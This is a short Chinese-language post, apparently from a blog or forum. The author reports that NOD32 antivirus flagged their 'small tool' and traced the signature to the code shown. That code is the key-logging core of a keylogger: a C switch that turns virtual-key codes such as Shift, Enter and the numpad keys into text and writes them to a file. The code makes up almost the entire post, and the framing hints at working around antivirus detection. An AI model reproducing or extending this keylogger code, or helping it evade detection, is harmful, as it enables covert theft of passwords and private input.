今天发现自己的一个小工具被nod32给干掉了,定位到的特征是在这个段落中
/////////////////////////////////////////////////////////////////////////////
switch(character)
{
case VK_SPACE:
myfputc(' ',file);
fclose(file);
break;
case VK_SHIFT:
myfputs("[SHIFT]",file);
fclose(file);
break;
case VK_RETURN:
myfputs("\n[ENTER]",file);
fclose(file);
break;
case VK_BACK:
myfputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
myfputs("[TAB]",file);
fclose(file);
break;
case VK_CONTROL:
myfputs("[CTRL]",file);
fclose(file);
break;
case VK_DELETE:
myfputs("[DEL]",file);
fclose(file);
break;
case VK_OEM_1:
myfputs("[;:]",file);
fclose(file);
break;
case VK_OEM_2:
myfputs("[/?]",file);
fclose(file);
break;
case VK_OEM_3:
myfputs("[`~]",file);
fclose(file);
break;
case VK_OEM_4:
myfputs("[ [{ ]",file);
fclose(file);
break;
case VK_OEM_5:
myfputs("[\\|]",file);
fclose(file);
break;
case VK_OEM_6:
myfputs("[ ]} ]",file);
fclose(file);
break;
case VK_OEM_7:
myfputs("['\"]",file);
fclose(file);
break;
case VK_OEM_PLUS:
myfputc('+',file);
fclose(file);
break;
case VK_OEM_COMMA:
myfputc(',',file);
fclose(file);
break;
case VK_OEM_MINUS:
myfputc('-',file);
fclose(file);
break;
case VK_OEM_PERIOD:
myfputc('.',file);
fclose(file);
break;
case VK_NUMPAD0:
myfputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
myfputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
myfputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
myfputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
myfputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
myfputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
myfputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
myfputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
myfputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
myfputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
myfputs("[CAPS LOCK]",file);
fclose(file);
break;
case 110:
myfputc('.',file);
fclose(file);
break;
case VK_MENU:
myfputs("[ALT]",file);
fclose(file);
break;
default:
fclose(file);
break;
}
}
}